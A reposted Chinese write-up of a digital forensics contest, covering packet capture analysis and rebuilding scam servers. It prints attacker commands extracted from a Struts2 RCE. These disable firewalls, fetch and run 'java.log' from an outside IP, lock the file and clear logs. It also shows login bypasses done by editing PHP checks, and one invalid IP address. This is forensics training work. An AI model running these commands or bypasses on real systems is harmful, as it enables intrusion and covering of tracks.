2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分)

这篇具有很好参考价值的文章主要介绍了2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

流量分析(共8题,合计22分)请根据流量包进行以下题目回答

分析“数据包1.cap”,请问客户端为什么访问不了服务器。( )

A.DDoS攻击

B.DoS攻击

C.SQL注入

D.文档攻击

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

DOS攻击,特征是短时间内TCP很高

分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1)

跳过,之后分析

分析“数据包1.cap”,文件下发服务器的IP地址是_______。(标准格式:127.0.0.1)

跳过,之后分析

分析“数据包1.cap”,攻击者利用_______漏洞进行远程代码执行。(标准格式:XXX)

http.response.code==404

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

这看起来是一个尝试利用开放的漏洞来执行恶意代码的攻击代码。具体来说,这段代码似乎是一个针对使用 Apache Struts 2 框架的应用程序的攻击尝试。这种攻击通常被称为远程代码执行(Remote Code Execution,RCE)攻击。

以下是代码的简要分析:

1. 代码首先尝试将请求标记为 "multipart/form-data",这可能是为了触发文件上传漏洞。

2. 接下来,代码似乎在尝试利用 Apache Struts 2 的漏洞,使用特定的对象和方法来执行操作,以获取操作系统信息。

3. 代码检查操作系统是否是 Windows,并根据不同的操作系统执行不同的命令。

4. 代码创建一个进程,执行操作系统命令(例如,"whoami"),并将命令的输出流传输回攻击者。

5. 最后,代码将输出流复制到响应流中,并刷新响应,以将结果发送回攻击者。

这段代码的目的似乎是尝试执行操作系统命令,并将命令的输出返回给攻击者。这种攻击可以导致严重的安全问题,因为攻击者可以在受害者服务器上执行恶意操作。

要保护应用程序免受此类攻击,建议采取以下安全措施:

1. 及时更新和维护应用程序依赖项,包括框架和库,以确保安全漏洞得到修复。

2. 配置安全策略,限制应用程序的执行权限,尤其是不要允许执行任意操作系统命令。

3. 实施输入验证和过滤,以防止恶意输入进入应用程序。

4. 使用 Web 应用程序防火墙(WAF)和入侵检测系统(IDS)等安全工具,以检测和阻止恶意请求。

5. 进行安全审计和漏洞扫描,以定期检查应用程序中的潜在漏洞。

6. 涉及文件上传功能时,对上传文件进行适当的验证和过滤,以防止恶意文件上传。

请注意,上述安全措施只是一些基本建议,实际应根据具体的应用程序和环境来制定更详细的安全策略。

这里找到了payload,我们就用pyshark提取一下

import re

import pyshark

cap = pyshark.FileCapture(r"E:\2023-龙信杯检材容器\2023龙信杯检材\流量包\流量包\数据包1.cap",
                          display_filter='http.request or (http.request and mime_multipart) or (http.response and data-text-lines)')
cookies = []
for pkt in cap:
    try:
        http = pkt['HTTP']
        try:
            print(re.findall(r"\(#cmd='(.*?)'\)", http.content_type)[0])
        except:
            pass
    except:
        pass

'''
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
service iptables stop
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
whoami
/etc/init.d/iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
pkill -9 java.log;pkill -9 Manager;pkill -9 ntpssh;pkill -9 Lin.1;pkill -9 syn188;pkill -9 sy;pkill -9 udp
wget http://120.210.129.29:5198/java.log
curl -O http://120.210.129.29:5198/java.log
chmod +x java.log
nohup ./java.log >/dev/null 2>&1 &
/java.log &
chattr +i java.log
rm -f java.log.1;rm -f java.log.2;rm -rf ntpssh;rm -rf Manager;rm -rf Lin.1;rm -rf syn188;rm -rf sy;rm -rf udp
mv /usr/bin/wget /usr/bin/scet
mv /usr/bin/curl /usr/bin/cuy
echo > /var/log/wtmp 
echo >/var/log/wtmp
echo > ./.bash_history
echo > ./.bash_history
'''
这段代码看起来是一系列命令行操作,但它包含了一些不寻常和潜在恶意的操作。我强烈建议不要运行或者尝试类似的操作,因为它们可能会对系统产生严重的负面影响,并且可能违反了计算机系统的安全政策。

以下是此代码中执行的操作的简要描述:

1. `whoami`:显示当前用户的用户名。在这个脚本中被多次调用,用于显示当前用户身份。

2. `service iptables stop`:停止iptables防火墙服务。这可能会导致系统的网络安全性降低。

3. `/etc/init.d/iptables stop`:停止iptables防火墙的另一种方式。

4. `SuSEfirewall2 stop` 和 `reSuSEfirewall2 stop`:停止SuSE Linux中的防火墙服务。

5. `pkill -9`:使用SIGKILL信号强制终止进程。该命令被用来终止多个不同的进程,包括名为java.log、Manager、ntpssh、Lin.1、syn188、sy和udp的进程。这可能会导致运行这些进程的应用程序被突然关闭,可能会导致数据损坏或系统不稳定。

6. `wget` 和 `curl` 命令:从指定URL下载文件,然后赋予该文件可执行权限并在后台运行它。这可能会导致恶意代码在系统上执行。

7. `chattr +i java.log`:将文件java.log标记为不可修改,这意味着无法修改或删除该文件。

8. `rm -f`:删除文件和目录,包括java.log.1、java.log.2、ntpssh、Manager、Lin.1、syn188、sy和udp。这可能会导致数据丢失。

9. `mv`:移动文件,将wget命令移动到scet,将curl命令移动到cuy。这可能是为了欺骗用户或混淆系统。

10. `echo >`:将空内容写入文件,包括wtmp和.bash_history,以清除它们的内容。

综合来看,这段代码包含了一系列可能会对系统和数据安全性造成严重影响的操作,可能是恶意操作的一部分。强烈建议不要运行这段代码,如果您遇到类似的操作,请立即采取适当的安全措施,如断开与网络的连接,并检查系统以确定是否遭受了攻击。

这里出现了文件下发的ip地址120.210.129.29

出问题的服务器IP地址可能是222.286.21.154

分析“数据包1.cap”,请提取恶意文件,并校验该文件的MD5值为_______。(标准格式:abcd)

导出java.log对象

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

87540c645d003e6eebf1102e6f904197

分析“数据包2.cap”,其获取文件的路径是________。(标准格式:D:/X/X/1.txt)

import pyshark
from urllib import parse

cap = pyshark.FileCapture(r"E:\2023-龙信杯检材容器\2023龙信杯检材\流量包\流量包\数据包2.cap", display_filter='http')
cookies = []
for pkt in cap:
    http = pkt['HTTP']
    try:
        print(parse.unquote(http.response_for_uri))
    except:
        # print(parse.unquote(http.request_full_uri))
        pass
    
'''
http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹
http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹
http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹
http://192.168.43.133/favicon.ico
http://192.168.43.133/favicon.ico
http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹/mail.png
'''

分析“数据包2.cap”,文件下载服务器的认证账号密码是_______。(标准格式:123)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

分析“数据包2.cap”,其下载的文件名大小有________字节。(标准格式:123)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

服务器取证1(共10题,合计29分)请根据服务器镜像1进行以下题目回答

服务器系统的版本号是_______。(格式:1.1.1111)

[root@localhost ~]# cat /etc/*-release
CentOS Linux release 7.9.2009 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

CentOS Linux release 7.9.2009 (Core)
CentOS Linux release 7.9.2009 (Core)

7.9.2009

网站数据库的版本号是_______。(格式:1.1.1111)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

[root@localhost ~]# systemctl restart mysqld
[root@localhost ~]# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.6.50-log Source distribution

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select @@version;
+------------+
| @@version  |
+------------+
| 5.6.50-log |
+------------+
1 row in set (0.00 sec)

宝塔面板的“超时”时间是_______分钟。(格式:50)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

网站源码备份压缩文件SHA256值是_______。(格式:64位小写)

[root@localhost www]# find ./ -name "*.tar.gz" 2>/dev/null
./server/nginx/src/pcre-8.43.tar.gz
./server/data.tar.gz
./backup/site/wwwroot.tar.gz
./dk_project/templates/nextcloud.tar.gz
./dk_project/templates/redis.tar.gz
./dk_project/templates/jenkins.tar.gz
./dk_project/templates/gitlab-ce.tar.gz
./dk_project/templates/kodbox.tar.gz
./dk_project/templates/mongodb.tar.gz
./dk_project/templates/nexus3.tar.gz
./dk_project/templates/awvs.tar.gz
./dk_project/templates/kafka.tar.gz
./dk_project/templates/solr.tar.gz
./dk_project/templates/gogs.tar.gz
./dk_project/templates/teleport.tar.gz
./dk_project/templates/prometheus.tar.gz
./dk_project/templates/metabase.tar.gz
./dk_project/templates/grafana.tar.gz
./dk_project/templates/nacos.tar.gz
[root@localhost www]# sha2
sha224sum  sha256sum  
[root@localhost www]# sha256sum ./backup/site/wwwroot.tar.gz
0bdeeacf755126dae9efd38f6a6d70323aa95217b629fd389e0e81f9b406be39  ./backup/site/wwwroot.tar.gz

分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

phpstorm追踪password函数

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

因为对thinkPHP这个框架熟悉,所以找到了Common.php,如果不熟悉的同学可以先把网站重构起来再仿真

分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。(标准格式:1234)

下面进行网站重构

/www/wwwroot/sb.wiiudot.cn/app/database.php

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

return [
    // 数据库类型
    'type'            => 'mysql',
    // 服务器地址
    'hostname'        => '127.0.0.1',
    // 数据库名
    'database'        => 'sb_wiiudot_cn',
    // 用户名
    'username'        => 'root',
    // 密码
    'password'        => 'lSfXN770ZPjte9m',
    // 端口
    'hostport'        => '3306',
    // 连接dsn
    'dsn'             => '',
    // 数据库连接参数
    'params'          => [],
    // 数据库编码默认采用utf8
    'charset'         => 'utf8',
    // 数据库表前缀
    'prefix'          => 'app_',
    // 数据库调试模式
    'debug'           => true,
    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)
    'deploy'          => 0,
    // 数据库读写是否分离 主从式有效
    'rw_separate'     => false,
    // 读写分离后 主服务器数量
    'master_num'      => 1,
    // 指定从服务器序号
    'slave_no'        => '',
    // 是否严格检查字段是否存在
    'fields_strict'   => true,
    // 数据集返回类型
    'resultset_type'  => 'array',
    // 自动写入时间戳字段
    'auto_timestamp'  => true,
    // 时间字段取出后的默认时间格式
    'datetime_format' => 'Y-m-d H:i:s',
    // 是否需要进行SQL性能分析
    'sql_explain'     => false,
];

把ip指向自己,修改用户名

查看nginx配置文件,发现三个网站的端口都是80

[root@localhost app]# cd /www/server/panel/vhost/nginx
[root@localhost nginx]# ls
0.default.conf  phpfpm_status.conf  sb.wiiudot.cn.conf  tcp  tf.chongwuxiaoyouxi.com.conf  wiiudot.cn.conf
[root@localhost nginx]# cat sb.wiiudot.cn.conf 
server
{
    listen 80;
    server_name sb.wiiudot.cn;
    index index.php index.html index.htm default.php default.htm default.html;
    root /www/wwwroot/sb.wiiudot.cn/public;

    #SSL-START SSL相关配置,请勿删除或修改下一行带注释的404规则
    #error_page 404/404.html;
    #SSL-END

    #ERROR-PAGE-START  错误页配置,可以注释、删除或修改
    #error_page 404 /404.html;
    #error_page 502 /502.html;
    #ERROR-PAGE-END

    #PHP-INFO-START  PHP引用配置,可以注释或修改
    include enable-php-56.conf;
    #PHP-INFO-END

    #REWRITE-START URL重写规则引用,修改后将导致面板设置的伪静态规则失效
    include /www/server/panel/vhost/rewrite/sb.wiiudot.cn.conf;
    #REWRITE-END

    #禁止访问的文件或目录
    location ~ ^/(\.user.ini|\.htaccess|\.git|\.env|\.svn|\.project|LICENSE|README.md)
    {
        return 404;
    }

    #一键申请SSL证书验证目录相关设置
    location ~ \.well-known{
        allow all;
    }

    #禁止在证书验证目录放入敏感文件
    if ( $uri ~ "^/\.well-known/.*\.(php|jsp|py|js|css|lua|ts|go|zip|tar\.gz|rar|7z|sql|bak)$" ) {
        return 403;
    }

    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
        expires      30d;
        error_log /dev/null;
        access_log /dev/null;
    }

    location ~ .*\.(js|css)?$
    {
        expires      12h;
        error_log /dev/null;
        access_log /dev/null;
    }
    access_log  /www/wwwlogs/sb.wiiudot.cn.log;
    error_log  /www/wwwlogs/sb.wiiudot.cn.error.log;
}
[root@localhost nginx]# bt 23 && bt 11 && bt 12 && bt 13 && bt 24 && bt 5
===============================================
正在执行(23)...
===============================================
Reload Bt-Panel..	done
|-已关闭BasicAuth认证
===============================================
正在执行(11)...
===============================================
|-已开启IP + User-Agent检测
|-此功能可以有效防止[重放攻击]
===============================================
正在执行(12)...
===============================================
Reload Bt-Panel..	done
|-已取消域名访问限制
===============================================
正在执行(13)...
===============================================
Reload Bt-Panel..	done
|-已取消IP访问限制
===============================================
正在执行(24)...
===============================================
|-已关闭谷歌认证
===============================================
正在执行(5)...
===============================================
请输入新的面板密码:123456
|-用户名: sultfaen
|-新密码: 123456
[root@localhost nginx]# bt 14
===============================================
正在执行(14)...
===============================================
==================================================================
BT-Panel default info!
==================================================================
外网面板地址:  https://36.113.29.197:12738/4a468245
内网面板地址:  https://192.168.110.131:12738/4a468245
username: sultfaen
password: ********
If you cannot access the panel,
release the following panel port [12738] in the security group
若无法访问面板,请检查防火墙/安全组是否有放行面板[12738]端口
注意:初始密码仅在首次登录面板前能正确获取,其它时间请通过 bt 5 命令修改密码
==================================================================

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

案例剖析:解决宝塔强制手机绑定问题的取证技巧与方法

我觉得这里可以用自己的账号方便一点(

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

到这里说明成功了,后续看日志找后台,发现是/admin

mysql> mysql> select * from app_admin limit 0,1;
+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+
| id | nickname | name  | password                         | thumb | create_time | update_time | login_time | login_ip      | admin_cate_id |
+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+
|  1 | 三叶     | admin | 81dbdde41342ef4304ed3f0bf6041278 |     9 |  1510885948 |  1597312087 | 1693121146 | 192.168.110.1 |             1 |
+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+
1 row in set (0.00 sec)

这里绕密的方法有很多,我选择更改判断逻辑

if($name['password'] != $post['password']) {
                        return $this->error('密码错误');
                    } else {
                        //是否记住账号
                        if(!empty($post['remember']) and $post['remember'] == 1) {
                            //检查当前有没有记住的账号
                            if(Cookie::has('usermember')) {
                                Cookie::delete('usermember');
                            }
                            //保存新的
                            Cookie::forever('usermember',$post['name']);
                        } else {
                            //未选择记住账号,或属于取消操作
                            if(Cookie::has('usermember')) {
                                Cookie::delete('usermember');
                            }
                        }
                        Session::set("admin",$name['id']); //保存新的
                        Session::set("admin_cate_id",$name['admin_cate_id']); //保存新的
                        //记录登录时间和ip
                        Db::name('admin')->where('id',$name['id'])->update(['login_ip' =>  $this->request->ip(),'login_time' => time()]);
                        //记录操作日志
                        addlog();
                        if(!cache('sessionIds')){
                            //创建一个数组,将id作为key把session_id作为值存到缓存中
                            $sessionIds = [];
                            $sessionIds[$name['id']] = session_id();
                            cache('sessionIds',$sessionIds);
                        }else{
                            //找到登录id 对应的session_id值并改变这个值
                            $sessionIds = cache('sessionIds');
                            $sessionIds[$name['id']] = session_id();
                            cache('sessionIds',$sessionIds);
                        }
                        return $this->success('登录成功,正在跳转...','admin/index/index');
                    }

if($name['password'] == $post['password'])

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

但是这跟数据库里的不一样

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

答案应该是67277

全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)

接下来几个网站架构都是一样的,就是数据库不同,不多做赘述

但是在重构第三个网站的时候出现了问题

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

我选择不去分析逻辑,将另一个网站的源码copy过去,修改数据库指向

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

回到题目本身,分别对sanye123,sql_0731_wiiudot,sb_wiiudot_cn做数据去重

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)

/www/wwwroot/sb.wiiudot.cn/app/database.php

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

return [
    // 数据库类型
    'type'            => 'mysql',
    // 服务器地址
    'hostname'        => '127.0.0.1',
    // 数据库名
    'database'        => 'sb_wiiudot_cn',
    // 用户名
    'username'        => 'root',
    // 密码
    'password'        => 'lSfXN770ZPjte9m',
    // 端口
    'hostport'        => '3306',
    // 连接dsn
    'dsn'             => '',
    // 数据库连接参数
    'params'          => [],
    // 数据库编码默认采用utf8
    'charset'         => 'utf8',
    // 数据库表前缀
    'prefix'          => 'app_',
    // 数据库调试模式
    'debug'           => true,
    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)
    'deploy'          => 0,
    // 数据库读写是否分离 主从式有效
    'rw_separate'     => false,
    // 读写分离后 主服务器数量
    'master_num'      => 1,
    // 指定从服务器序号
    'slave_no'        => '',
    // 是否严格检查字段是否存在
    'fields_strict'   => true,
    // 数据集返回类型
    'resultset_type'  => 'array',
    // 自动写入时间戳字段
    'auto_timestamp'  => true,
    // 时间字段取出后的默认时间格式
    'datetime_format' => 'Y-m-d H:i:s',
    // 是否需要进行SQL性能分析
    'sql_explain'     => false,
];

但这个密码是错的,备份文件里的database.php的密码是对的

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

验证一下

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

服务器取证2(共13题,合计39分)请根据服务器镜像2进行以下题目回答

请分析宝塔面板中默认建站目录是_______。(标准格式:/etc/www)

/www/server/panel/data/default.db

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

在宝塔数据库目录有一个只含有一个表结构的数据库,请找到该“表结构文件”并分析出第六个字段的字段类型是_______。(标准格式:int(11))

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”网站绑定的域名是_______。(标准格式:www.baidu.com)

[root@localhost data]# cd /www/server/panel/vhost/nginx
[root@localhost nginx]# ls
0.default.conf  192.168.19.128.conf  phpfpm_status.conf  tcp
[root@localhost nginx]# cat 192.168.19.128.conf 
server
{
    listen 80;
    server_name jinrong.goyasha.com;
    index index.php index.html index.htm default.php default.htm default.html;
    root /www/wwwroot/192.168.19.128/public;

    #SSL-START SSL相关配置,请勿删除或修改下一行带注释的404规则
    #error_page 404/404.html;
    #SSL-END

    #ERROR-PAGE-START  错误页配置,可以注释、删除或修改
    #error_page 404 /404.html;
    #error_page 502 /502.html;
    #ERROR-PAGE-END

    #PHP-INFO-START  PHP引用配置,可以注释或修改
    include enable-php-00.conf;
    #PHP-INFO-END

    #REWRITE-START URL重写规则引用,修改后将导致面板设置的伪静态规则失效
    include /www/server/panel/vhost/rewrite/192.168.19.128.conf;
    #REWRITE-END

    #禁止访问的文件或目录
    location ~ ^/(\.user.ini|\.htaccess|\.git|\.svn|\.project|LICENSE|README.md)
    {
        return 404;
    }

    #一键申请SSL证书验证目录相关设置
    location ~ \.well-known{
        allow all;
    }

    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
        expires      30d;
        error_log /dev/null;
        access_log /dev/null;
    }

    location ~ .*\.(js|css)?$
    {
        expires      12h;
        error_log /dev/null;
        access_log /dev/null;
    }
    access_log  /www/wwwlogs/192.168.19.128.log;
    error_log  /www/wwwlogs/192.168.19.128.error.log;
}

jinrong.goyasha.com

请访问“乐享金融”数据库并找到用户表,假设密码为123456,还原uid为2909,用户名为goyasha加密后密码的值是_______。(标准格式:abcdefghijklmnopqrstuvwsyz)

我选择本地重构网站

mysql> show variables like "%datadir%";
+---------------+-------------------+
| Variable_name | Value             |
+---------------+-------------------+
| datadir       | /www/server/data/ |
+---------------+-------------------+
1 row in set (0.00 sec)

mysql> select @@version;
+------------+
| @@version  |
+------------+
| 5.6.50-log |
+------------+
1 row in set (0.00 sec)

找数据目录,确定数据库版本

[root@localhost ~]# php -v
PHP Warning:  PHP Startup: Unable to load dynamic library '/www/server/php/55/lib/php/extensions/no-debug-non-zts-20121212/zip.so' - /www/server/php/55/lib/php/extensions/no-debug-non-zts-20121212/zip.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP 5.5.38 (cli) (built: May 13 2020 16:03:24) 
Copyright (c) 1997-2015 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2015 Zend Technologies

确定php版本

替换data目录

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

绕密,否则无法连接数据库

根目录不用加public

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

基本的绕密

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

成功登录后台,但是无法正常显示数据

回到题目

这是加密逻辑

md5($data['password'].$result['utime'])

查询utime

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请重建“乐享金融”,访问平台前台登陆界面,会员登陆界面顶部LOGO上的几个字是_______。(标准格式:爱金融)

睿文化

请分析“乐享金融”一共添加了_______个非外汇产品。(标准格式:5)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

网站里是两个,数据库翻一翻

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”设置充值泰达币的地址是_______。(标准格式:EDFGF97B46234FDADSDF0270CB3E)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。(标准格式:12345678)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。(标准格式:张三)

这里有两张干扰的表格wp_bankcard和wp_userinfo

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

这里的张教瘦是accountname并不是username

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”,平仓时间为“2022/03/01 18:52:01”,以太坊/泰达币的这一笔交易的平仓价格是_______。(标准格式:1888.668)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。(标准格式:2022-1-11.1:22:43)

导入备份的sql文件

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

宝塔面板某用户曾尝试进行一次POST请求,参数为“/BTCloud?action=UploadFilesData”,请问该用户疑似使用的( )电脑系统进行访问请求的。

A.Windows 8.1

B.Windows 10

C.Windows 11

D.Windows Server 2000

/www/server/panel/logs/request全部拉出来

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

Windows NT 6.3是指Windows操作系统的一个内部版本号。它对应于Windows 8.1和Windows Server 2012 R2。这个版本于2013年发布,是Windows 8的升级版本,引入了一些改进和新功能,以提升用户体验和系统性能。但需要注意的是,Windows 8和Windows 8.1并不像Windows XP、Windows 7等之间的转变那么显著,因此它们在很多方面的界面和功能都比较相似。

请分析该服务器镜像最高权限“root”账户的密码是_______。(标准格式:a123456)

2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分),服务器,运维

参考文章:第一届“龙信杯”电子数据取证竞赛Writeup-CSDN博客

b3nguang写于2023/9/26文章来源地址https://www.toymoban.com/news/detail-713512.html

到了这里,关于2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023年 首届盘古石杯全国电子数据取证大赛 技能赛决赛 服务器题解析

    root@P@88w0rd 方法1 john的电脑使用账号john密码paofen登录,chrome浏览器中密码管理器内查看 切记仿真时不要清空账号密码 方法2 使用计算机取证软件解析john的电脑的镜像浏览器记录密码 TrueNAS-13.0-U4 使用虚拟机内TrueNAS显示的IP地址用浏览器访问后使用账号root 密码P@88w0rd 登陆后在

    2024年02月11日
    浏览(44)
  • 2023蓝帽杯半决赛电子取证+CTF部分题解

    非预期 先将data.xlsx中到的每一列都按照大小排序 之后将加粗的字体的背景颜色改为黑色

    2024年02月07日
    浏览(42)
  • 电子数据取证(一)

    电子数据的特点 **1、以数字化形式存在。**所有的电子数据都是基于计算机应用和通信等电子化技术手段形成的,用以表示文字、图形符号、数字、字母等信息的资料。与其他证据种类不同,电子数据在本质上而言是以电子形式存储或者传输的。 **2、具有开放性的特征。**从

    2024年02月13日
    浏览(44)
  • 一文读懂电子数据取证

